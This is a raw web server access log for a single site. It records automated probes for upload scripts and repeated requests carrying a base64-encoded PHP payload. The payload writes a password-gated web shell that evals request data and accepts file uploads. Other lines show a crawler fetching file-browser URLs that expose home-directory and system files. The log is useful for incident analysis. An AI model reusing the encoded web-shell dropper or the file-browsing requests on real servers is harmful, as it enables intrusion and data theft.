20.41.85.28 - - [01/Dec/2025:20:39:27 +0000] "GET /wp.php HTTP/1.1" 404 1251 "https://www.bing.com/" "Mozilla/5.0 (iPhone; CPU iPhone OS 17_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) CriOS/119.0.6045.109 Mobile/15E148 Safari/604.1"
20.41.85.28 - - [01/Dec/2025:20:39:28 +0000] "GET /xmrlpc.php HTTP/1.1" 404 1251 "https://www.google.co.uk/" "Mozilla/5.0 (Linux; Android 13; SM-S908E) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.0.0 Mobile Safari/537.36"
198.186.131.59 - - [01/Dec/2025:20:40:38 +0000] "POST /goods.php?upload HTTP/1.1" 404 1251 "http://galavista.com/chosen.php?upload" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2725.60 Safari/537.36"
45.145.118.189 - - [01/Dec/2025:20:42:25 +0000] "GET /robots.txt HTTP/1.0" 404 1251 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/139.0.0.0 Safari/537.36/Nutch-1.21-SNAPSHOT"
198.186.131.59 - - [01/Dec/2025:20:30:12 +0000] "POST /chosen.php?upload HTTP/1.1" 404 1251 "http://galavista.com/mah.php?upload" "Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64; rv:46.0) Gecko/20100101 Firefox/46.0"
198.186.131.59 - - [01/Dec/2025:20:30:12 +0000] "POST /goods.php?upload HTTP/1.1" 404 1251 "http://galavista.com/chosen.php?upload" "Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64; rv:46.0) Gecko/20100101 Firefox/46.0"
198.186.131.59 - - [01/Dec/2025:20:30:12 +0000] "GET /wp-admin/css/colors/blue/blue.php?wall=ZmlsZV9wdXRfY29udGVudHMoJF9TRVJWRVJbJ0RPQ1VNRU5UX1JPT1QnXS4nL2VlMDg3NmJmNGU3Mi5waHAnLCc8P3BocCBlY2hvIDQwOTcyMyoyMDtpZihtZDUoJF9DT09LSUVbImQiXSk9PSJcNjFceDM3XDYwXDYyXHgzOFwxNDZceDM0XDcwXDY3XDE0M1wxNDJceDMyXDE0MVw3MFx4MzRceDM2XHgzMFw2N1x4MzZcNjRceDM2XHg2NFwxNDFcNjNcMTQxXDE0NFw2M1w3MFw2N1x4MzhcMTQ1XDE0MyIpe2VjaG8iXHg2Zlx4NmIiO2V2YWwoYmFzZTY0X2RlY29kZSgkX1JFUVVFU1RbImlkIl0pKTtpZigkX1BPU1RbIlwxNjVcMTYwIl09PSJcMTY1XHg3MCIpe0Bjb3B5KCRfRklMRVNbIlx4NjZcMTUxXHg2Y1x4NjUiXVsiXDE2NFwxNTVceDcwXHg1Zlx4NmVceDYxXHg2ZFx4NjUiXSwkX0ZJTEVTWyJcMTQ2XHg2OVwxNTRceDY1Il1bIlwxNTZcMTQxXDE1NVx4NjUiXSk7fX0/PgonKTs= HTTP/1.1" 404 1251 "http://galavista.com/goods.php?upload" "Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64; rv:46.0) Gecko/20100101 Firefox/46.0"
198.186.131.59 - - [01/Dec/2025:20:30:13 +0000] "GET /ee0876bf4e72.php HTTP/1.1" 404 1251 "http://galavista.com/wp-admin/css/colors/blue/blue.php?wall=ZmlsZV9wdXRfY29udGVudHMoJF9TRVJWRVJbJ0RPQ1VNRU5UX1JPT1QnXS4nL2VlMDg3NmJmNGU3Mi5waHAnLCc8P3BocCBlY2hvIDQwOTcyMyoyMDtpZihtZDUoJF9DT09LSUVbImQiXSk9PSJcNjFceDM3XDYwXDYyXHgzOFwxNDZceDM0XDcwXDY3XDE0M1wxNDJceDMyXDE0MVw3MFx4MzRceDM2XHgzMFw2N1x4MzZcNjRceDM2XHg2NFwxNDFcNjNcMTQxXDE0NFw2M1w3MFw2N1x4MzhcMTQ1XDE0MyIpe2VjaG8iXHg2Zlx4NmIiO2V2YWwoYmFzZTY0X2RlY29kZSgkX1JFUVVFU1RbImlkIl0pKTtpZigkX1BPU1RbIlwxNjVcMTYwIl09PSJcMTY1XHg3MCIpe0Bjb3B5KCRfRklMRVNbIlx4NjZcMTUxXHg2Y1x4NjUiXVsiXDE2NFwxNTVceDcwXHg1Zlx4NmVceDYxXHg2ZFx4NjUiXSwkX0ZJTEVTWyJcMTQ2XHg2OVwxNTRceDY1Il1bIlwxNTZcMTQxXDE1NVx4NjUiXSk7fX0/PgonKTs=" "Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64; rv:46.0) Gecko/20100101 Firefox/46.0"
216.73.216.189 - - [01/Dec/2025:20:32:11 +0000] "GET /dfb27f996d.php?filesrc=%2Fhome%2Fi442524%2Fpublic_html%2Fdfb27f996d.php&path=%2Fhome%2Fi442524%2Fpublic_html HTTP/1.1" 200 2788 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.189 - - [01/Dec/2025:20:32:11 +0000] "GET /dfb27f996d.php?filesrc=%2Fhome%2Fi442524%2Fpublic_html%2Ferror_log&path=%2Fhome%2Fi442524%2Fpublic_html HTTP/1.1" 200 16868 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.189 - - [01/Dec/2025:20:32:12 +0000] "GET /7709b/?filesrc=%2Fhome%2Fi442524%2Fpublic_html%2Ferror_log&path=%2Fhome%2Fi442524%2Fpublic_html HTTP/1.1" 200 16857 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.189 - - [01/Dec/2025:20:32:11 +0000] "GET /7709b/?filesrc=%2Fhome%2Fi442524%2Fpublic_html%2F7709b%2Ferror_log&path=%2Fhome%2Fi442524%2Fpublic_html%2F7709b HTTP/1.1" 200 24793 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.189 - - [01/Dec/2025:20:35:22 +0000] "GET /dfb27f996d.php?filesrc=%2Fhome%2Fi442524%2Fpublic_html%2Fa839d%2F_usr_sbin_httpd_-V.tar&path=%2Fhome%2Fi442524%2Fpublic_html%2Fa839d HTTP/1.1" 200 0 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
43.166.226.57 - - [01/Dec/2025:20:42:17 +0000] "GET /7709b/?path=/ HTTP/1.1" 200 1515 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
43.156.156.96 - - [01/Dec/2025:20:49:33 +0000] "GET /7709b/?path=/home/i442524/.cpanel HTTP/1.1" 200 1389 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
192.121.16.196 - - [01/Dec/2025:20:50:19 +0000] "GET / HTTP/1.1" 200 1495 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:46.0) Gecko/20100101 Firefox/46.0"
192.121.16.196 - - [01/Dec/2025:20:50:34 +0000] "POST /chosen.php?upload HTTP/1.1" 404 1251 "http://galavista.com/mah.php?upload" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:46.0) Gecko/20100101 Firefox/46.0"
192.121.16.196 - - [01/Dec/2025:20:50:34 +0000] "POST /goods.php?upload HTTP/1.1" 404 1251 "http://galavista.com/chosen.php?upload" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:46.0) Gecko/20100101 Firefox/46.0"
192.121.16.196 - - [01/Dec/2025:20:50:35 +0000] "GET /wp-admin/css/colors/blue/blue.php?wall=ZmlsZV9wdXRfY29udGVudHMoJF9TRVJWRVJbJ0RPQ1VNRU5UX1JPT1QnXS4nL2VlMDg3NmJmNGU3Mi5waHAnLCc8P3BocCBlY2hvIDQwOTcyMyoyMDtpZihtZDUoJF9DT09LSUVbImQiXSk9PSJcNjFceDM3XDYwXDYyXHgzOFwxNDZceDM0XDcwXDY3XDE0M1wxNDJceDMyXDE0MVw3MFx4MzRceDM2XHgzMFw2N1x4MzZcNjRceDM2XHg2NFwxNDFcNjNcMTQxXDE0NFw2M1w3MFw2N1x4MzhcMTQ1XDE0MyIpe2VjaG8iXHg2Zlx4NmIiO2V2YWwoYmFzZTY0X2RlY29kZSgkX1JFUVVFU1RbImlkIl0pKTtpZigkX1BPU1RbIlwxNjVcMTYwIl09PSJcMTY1XHg3MCIpe0Bjb3B5KCRfRklMRVNbIlx4NjZcMTUxXHg2Y1x4NjUiXVsiXDE2NFwxNTVceDcwXHg1Zlx4NmVceDYxXHg2ZFx4NjUiXSwkX0ZJTEVTWyJcMTQ2XHg2OVwxNTRceDY1Il1bIlwxNTZcMTQxXDE1NVx4NjUiXSk7fX0/PgonKTs= HTTP/1.1" 404 1251 "http://galavista.com/goods.php?upload" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:46.0) Gecko/20100101 Firefox/46.0"
34.230.64.152 - - [01/Dec/2025:20:56:13 +0000] "GET / HTTP/1.1" 200 1496 "-" "Xenu Link Sleuth/1.3.8"
192.121.16.196 - - [01/Dec/2025:21:00:31 +0000] "GET /wp-admin/css/colors/blue/blue.php?wall=ZmlsZV9wdXRfY29udGVudHMoJF9TRVJWRVJbJ0RPQ1VNRU5UX1JPT1QnXS4nL2VlMDg3NmJmNGU3Mi5waHAnLCc8P3BocCBlY2hvIDQwOTcyMyoyMDtpZihtZDUoJF9DT09LSUVbImQiXSk9PSJcNjFceDM3XDYwXDYyXHgzOFwxNDZceDM0XDcwXDY3XDE0M1wxNDJceDMyXDE0MVw3MFx4MzRceDM2XHgzMFw2N1x4MzZcNjRceDM2XHg2NFwxNDFcNjNcMTQxXDE0NFw2M1w3MFw2N1x4MzhcMTQ1XDE0MyIpe2VjaG8iXHg2Zlx4NmIiO2V2YWwoYmFzZTY0X2RlY29kZSgkX1JFUVVFU1RbImlkIl0pKTtpZigkX1BPU1RbIlwxNjVcMTYwIl09PSJcMTY1XHg3MCIpe0Bjb3B5KCRfRklMRVNbIlx4NjZcMTUxXHg2Y1x4NjUiXVsiXDE2NFwxNTVceDcwXHg1Zlx4NmVceDYxXHg2ZFx4NjUiXSwkX0ZJTEVTWyJcMTQ2XHg2OVwxNTRceDY1Il1bIlwxNTZcMTQxXDE1NVx4NjUiXSk7fX0/PgonKTs= HTTP/1.1" 404 1251 "http://galavista.com/goods.php?upload" "Mozilla/5.0 (X11; Linux x86_64; rv:51.0) Gecko/20100101 Firefox/51.0"
192.121.16.196 - - [01/Dec/2025:21:00:32 +0000] "GET /ee0876bf4e72.php HTTP/1.1" 404 1251 "http://galavista.com/wp-admin/css/colors/blue/blue.php?wall=ZmlsZV9wdXRfY29udGVudHMoJF9TRVJWRVJbJ0RPQ1VNRU5UX1JPT1QnXS4nL2VlMDg3NmJmNGU3Mi5waHAnLCc8P3BocCBlY2hvIDQwOTcyMyoyMDtpZihtZDUoJF9DT09LSUVbImQiXSk9PSJcNjFceDM3XDYwXDYyXHgzOFwxNDZceDM0XDcwXDY3XDE0M1wxNDJceDMyXDE0MVw3MFx4MzRceDM2XHgzMFw2N1x4MzZcNjRceDM2XHg2NFwxNDFcNjNcMTQxXDE0NFw2M1w3MFw2N1x4MzhcMTQ1XDE0MyIpe2VjaG8iXHg2Zlx4NmIiO2V2YWwoYmFzZTY0X2RlY29kZSgkX1JFUVVFU1RbImlkIl0pKTtpZigkX1BPU1RbIlwxNjVcMTYwIl09PSJcMTY1XHg3MCIpe0Bjb3B5KCRfRklMRVNbIlx4NjZcMTUxXHg2Y1x4NjUiXVsiXDE2NFwxNTVceDcwXHg1Zlx4NmVceDYxXHg2ZFx4NjUiXSwkX0ZJTEVTWyJcMTQ2XHg2OVwxNTRceDY1Il1bIlwxNTZcMTQxXDE1NVx4NjUiXSk7fX0/PgonKTs=" "Mozilla/5.0 (X11; Linux x86_64; rv:51.0) Gecko/20100101 Firefox/51.0"
216.73.216.189 - - [01/Dec/2025:21:03:21 +0000] "GET /dfb27f996d.php?path=%2Fhome%2Fi442524%2F.cagefs%2Fvar HTTP/1.1" 200 960 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.189 - - [01/Dec/2025:21:03:21 +0000] "GET /dfb27f996d.php?filesrc=%2F%2Fsbin%2Fnamed-compilezone&path=%2F%2Fsbin HTTP/1.1" 200 617 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.189 - - [01/Dec/2025:21:03:22 +0000] "GET /29b99/?filesrc=%2Fhome%2Fi442524%2F.ftpquota&path=%2Fhome%2Fi442524 HTTP/1.1" 200 638 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.189 - - [01/Dec/2025:21:03:20 +0000] "GET /d4fae/?path=%2Fhome%2F..%2F. HTTP/1.1" 200 1880 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
198.186.131.59 - - [01/Dec/2025:20:40:38 +0000] "GET /wp-admin/css/colors/blue/blue.php?wall=ZmlsZV9wdXRfY29udGVudHMoJF9TRVJWRVJbJ0RPQ1VNRU5UX1JPT1QnXS4nL2VlMDg3NmJmNGU3Mi5waHAnLCc8P3BocCBlY2hvIDQwOTcyMyoyMDtpZihtZDUoJF9DT09LSUVbImQiXSk9PSJcNjFceDM3XDYwXDYyXHgzOFwxNDZceDM0XDcwXDY3XDE0M1wxNDJceDMyXDE0MVw3MFx4MzRceDM2XHgzMFw2N1x4MzZcNjRceDM2XHg2NFwxNDFcNjNcMTQxXDE0NFw2M1w3MFw2N1x4MzhcMTQ1XDE0MyIpe2VjaG8iXHg2Zlx4NmIiO2V2YWwoYmFzZTY0X2RlY29kZSgkX1JFUVVFU1RbImlkIl0pKTtpZigkX1BPU1RbIlwxNjVcMTYwIl09PSJcMTY1XHg3MCIpe0Bjb3B5KCRfRklMRVNbIlx4NjZcMTUxXHg2Y1x4NjUiXVsiXDE2NFwxNTVceDcwXHg1Zlx4NmVceDYxXHg2ZFx4NjUiXSwkX0ZJTEVTWyJcMTQ2XHg2OVwxNTRceDY1Il1bIlwxNTZcMTQxXDE1NVx4NjUiXSk7fX0/PgonKTs= HTTP/1.1" 404 1251 "http://galavista.com/goods.php?upload" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2725.60 Safari/537.36"
198.186.131.59 - - [01/Dec/2025:20:40:38 +0000] "GET /ee0876bf4e72.php HTTP/1.1" 404 1251 "http://galavista.com/wp-admin/css/colors/blue/blue.php?wall=ZmlsZV9wdXRfY29udGVudHMoJF9TRVJWRVJbJ0RPQ1VNRU5UX1JPT1QnXS4nL2VlMDg3NmJmNGU3Mi5waHAnLCc8P3BocCBlY2hvIDQwOTcyMyoyMDtpZihtZDUoJF9DT09LSUVbImQiXSk9PSJcNjFceDM3XDYwXDYyXHgzOFwxNDZceDM0XDcwXDY3XDE0M1wxNDJceDMyXDE0MVw3MFx4MzRceDM2XHgzMFw2N1x4MzZcNjRceDM2XHg2NFwxNDFcNjNcMTQxXDE0NFw2M1w3MFw2N1x4MzhcMTQ1XDE0MyIpe2VjaG8iXHg2Zlx4NmIiO2V2YWwoYmFzZTY0X2RlY29kZSgkX1JFUVVFU1RbImlkIl0pKTtpZigkX1BPU1RbIlwxNjVcMTYwIl09PSJcMTY1XHg3MCIpe0Bjb3B5KCRfRklMRVNbIlx4NjZcMTUxXHg2Y1x4NjUiXVsiXDE2NFwxNTVceDcwXHg1Zlx4NmVceDYxXHg2ZFx4NjUiXSwkX0ZJTEVTWyJcMTQ2XHg2OVwxNTRceDY1Il1bIlwxNTZcMTQxXDE1NVx4NjUiXSk7fX0/PgonKTs=" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2725.60 Safari/537.36"
192.121.16.196 - - [01/Dec/2025:20:50:33 +0000] "POST /mah.php?upload HTTP/1.1" 404 1251 "http://galavista.com/" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:46.0) Gecko/20100101 Firefox/46.0"
192.121.16.196 - - [01/Dec/2025:21:00:03 +0000] "GET / HTTP/1.1" 200 1496 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:51.0) Gecko/20100101 Firefox/51.0"
192.121.16.196 - - [01/Dec/2025:21:00:03 +0000] "POST /mah.php?upload HTTP/1.1" 404 1251 "http://galavista.com/" "Mozilla/5.0 (X11; Linux x86_64; rv:51.0) Gecko/20100101 Firefox/51.0"
192.121.16.196 - - [01/Dec/2025:21:00:11 +0000] "POST /chosen.php?upload HTTP/1.1" 404 1251 "http://galavista.com/mah.php?upload" "Mozilla/5.0 (X11; Linux x86_64; rv:51.0) Gecko/20100101 Firefox/51.0"
192.121.16.196 - - [01/Dec/2025:21:00:11 +0000] "POST /goods.php?upload HTTP/1.1" 404 1251 "http://galavista.com/chosen.php?upload" "Mozilla/5.0 (X11; Linux x86_64; rv:51.0) Gecko/20100101 Firefox/51.0"
216.73.216.189 - - [01/Dec/2025:21:00:49 +0000] "GET /7709b/?filesrc=%2Fhome%2Fi442524%2F.bash_profile&path=%2Fhome%2Fi442524 HTTP/1.1" 200 0 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
49.51.72.236 - - [01/Dec/2025:21:01:11 +0000] "GET /7709b/?path=/home/i442524/public_html HTTP/1.1" 200 1470 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
216.73.216.189 - - [01/Dec/2025:21:04:18 +0000] "GET /dfb27f996d.php?path=%2Fhome%2Fi442524%2F.cagefs%2Fopt HTTP/1.1" 200 852 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.189 - - [01/Dec/2025:21:04:18 +0000] "GET /29b99/?path=%2Fhome%2Fi442524%2Fmail%2Ftmp HTTP/1.1" 200 689 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.189 - - [01/Dec/2025:21:04:18 +0000] "GET /29b99/?path=%2Fhome%2Fi442524%2Ftmp HTTP/1.1" 200 1025 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.189 - - [01/Dec/2025:21:04:18 +0000] "GET /19055/?path=%2Fhome%2Fi442524%2Faccess-logs%2Fgalavista.com-ssl_log HTTP/1.1" 500 0 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.189 - - [01/Dec/2025:21:03:22 +0000] "GET /29b99/?path=%2Fhome%2Fi442524%2F.cl.selector HTTP/1.1" 200 917 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.189 - - [01/Dec/2025:21:03:23 +0000] "GET /19055/?path=%2Fhome%2Fi442524%2Fssl HTTP/1.1" 200 1606 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.189 - - [01/Dec/2025:21:03:23 +0000] "GET /dfb27f996d.php?filesrc=%2Fhome%2Fi442524%2F.contactemail&path=%2Fhome%2Fi442524 HTTP/1.1" 200 644 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.189 - - [01/Dec/2025:21:04:19 +0000] "GET /29b99/?path=%2Fhome%2Fi442524%2F.sitepad HTTP/1.1" 200 0 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.189 - - [01/Dec/2025:21:04:43 +0000] "GET /dfb27f996d.php?filesrc=%2F%2Fsbin%2Funix_chkpwd&path=%2F%2Fsbin HTTP/1.1" 200 614 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.189 - - [01/Dec/2025:21:04:43 +0000] "GET /dfb27f996d.php?filesrc=%2Fhome%2Fi442524%2F.myimunify_id&path=%2Fhome%2Fi442524 HTTP/1.1" 200 704 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.189 - - [01/Dec/2025:21:04:44 +0000] "GET /dfb27f996d.php?filesrc=%2F%2Fsbin%2Fproxyexec&path=%2F%2Fsbin HTTP/1.1" 200 609 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.189 - - [01/Dec/2025:21:04:43 +0000] "GET /19055/?path=%2Fhome%2Fi442524%2Fwww%2F29b99 HTTP/1.1" 200 1661 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.189 - - [01/Dec/2025:21:04:44 +0000] "GET /dfb27f996d.php?path=%2Fhome%2Fi442524%2F.cagefs%2Ftmp HTTP/1.1" 200 967 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.189 - - [01/Dec/2025:21:04:44 +0000] "GET /dfb27f996d.php?path=%2Fhome%2Fi442524%2F.caldav HTTP/1.1" 200 1169 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.189 - - [01/Dec/2025:21:04:44 +0000] "GET /dfb27f996d.php?path=%2F%2Fhome1 HTTP/1.1" 200 661 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.189 - - [01/Dec/2025:21:04:45 +0000] "GET /19055/?path=%2Fhome%2Fi442524%2Fwww%2F35b2e HTTP/1.1" 200 5392 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.189 - - [01/Dec/2025:21:04:45 +0000] "GET /29b99/?path=%2Fhome%2Fi442524%2Fssl HTTP/1.1" 200 1000 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.189 - - [01/Dec/2025:21:04:45 +0000] "GET /dfb27f996d.php?filesrc=%2Fhome%2Fi442524%2F.ftpquota&path=%2Fhome%2Fi442524 HTTP/1.1" 200 638 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.189 - - [01/Dec/2025:21:04:45 +0000] "GET /dfb27f996d.php?path=%2F%2Fusr HTTP/1.1" 200 1012 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.189 - - [01/Dec/2025:21:04:43 +0000] "GET /29b99/?path=%2Fhome%2Fi442524%2Flscache HTTP/1.1" 200 682 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.189 - - [01/Dec/2025:21:04:43 +0000] "GET /19055/?path=%2Fhome%2Fi442524%2Fwww%2F7709b HTTP/1.1" 200 1558 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
45.145.118.189 - - [01/Dec/2025:20:42:26 +0000] "GET / HTTP/1.1" 200 1497 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/139.0.0.0 Safari/537.36/Nutch-1.21-SNAPSHOT"
192.121.16.196 - - [01/Dec/2025:20:50:45 +0000] "GET /ee0876bf4e72.php HTTP/1.1" 404 1251 "http://galavista.com/wp-admin/css/colors/blue/blue.php?wall=ZmlsZV9wdXRfY29udGVudHMoJF9TRVJWRVJbJ0RPQ1VNRU5UX1JPT1QnXS4nL2VlMDg3NmJmNGU3Mi5waHAnLCc8P3BocCBlY2hvIDQwOTcyMyoyMDtpZihtZDUoJF9DT09LSUVbImQiXSk9PSJcNjFceDM3XDYwXDYyXHgzOFwxNDZceDM0XDcwXDY3XDE0M1wxNDJceDMyXDE0MVw3MFx4MzRceDM2XHgzMFw2N1x4MzZcNjRceDM2XHg2NFwxNDFcNjNcMTQxXDE0NFw2M1w3MFw2N1x4MzhcMTQ1XDE0MyIpe2VjaG8iXHg2Zlx4NmIiO2V2YWwoYmFzZTY0X2RlY29kZSgkX1JFUVVFU1RbImlkIl0pKTtpZigkX1BPU1RbIlwxNjVcMTYwIl09PSJcMTY1XHg3MCIpe0Bjb3B5KCRfRklMRVNbIlx4NjZcMTUxXHg2Y1x4NjUiXVsiXDE2NFwxNTVceDcwXHg1Zlx4NmVceDYxXHg2ZFx4NjUiXSwkX0ZJTEVTWyJcMTQ2XHg2OVwxNTRceDY1Il1bIlwxNTZcMTQxXDE1NVx4NjUiXSk7fX0/PgonKTs=" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:46.0) Gecko/20100101 Firefox/46.0"
216.73.216.189 - - [01/Dec/2025:21:00:50 +0000] "GET /7709b/?filesrc=%2Fhome%2Fi442524%2Fmail%2Fdovecot.mailbox.log&path=%2Fhome%2Fi442524%2Fmail HTTP/1.1" 200 641 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.189 - - [01/Dec/2025:21:00:50 +0000] "GET /dfb27f996d.php?path=%2Fhome%2Fi442524%2Ftmp%2Fwebalizerftp HTTP/1.1" 200 693 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.189 - - [01/Dec/2025:21:00:50 +0000] "GET /d4fae/?path=%2Fhome%2F..%2Ftmp HTTP/1.1" 200 1644 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.189 - - [01/Dec/2025:21:00:50 +0000] "GET /dfb27f996d.php?filesrc=%2Fhome%2Fi442524%2F.bash_profile&path=%2Fhome%2Fi442524 HTTP/1.1" 200 743 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.189 - - [01/Dec/2025:21:02:43 +0000] "GET /robots.txt HTTP/1.1" 404 1251 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.189 - - [01/Dec/2025:21:04:19 +0000] "GET /29b99/?filesrc=%2Fhome%2Fi442524%2F.spamassassinboxenable&path=%2Fhome%2Fi442524 HTTP/1.1" 200 0 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.189 - - [01/Dec/2025:21:04:44 +0000] "GET /19055/?path=%2Fhome%2Fi442524%2Fpublic_ftp HTTP/1.1" 200 1450 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.189 - - [01/Dec/2025:21:04:43 +0000] "GET /dfb27f996d.php?filesrc=%2F%2Fsbin%2Fdnssec-keymgr&path=%2F%2Fsbin HTTP/1.1" 200 1049 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.189 - - [01/Dec/2025:21:04:43 +0000] "GET /29b99/?filesrc=%2Fhome%2Fi442524%2Fmail%2Fdovecot.index&path=%2Fhome%2Fi442524%2Fmail HTTP/1.1" 200 634 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.189 - - [01/Dec/2025:21:06:59 +0000] "GET /dfb27f996d.php?path=%2F%2Flib HTTP/1.1" 200 0 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
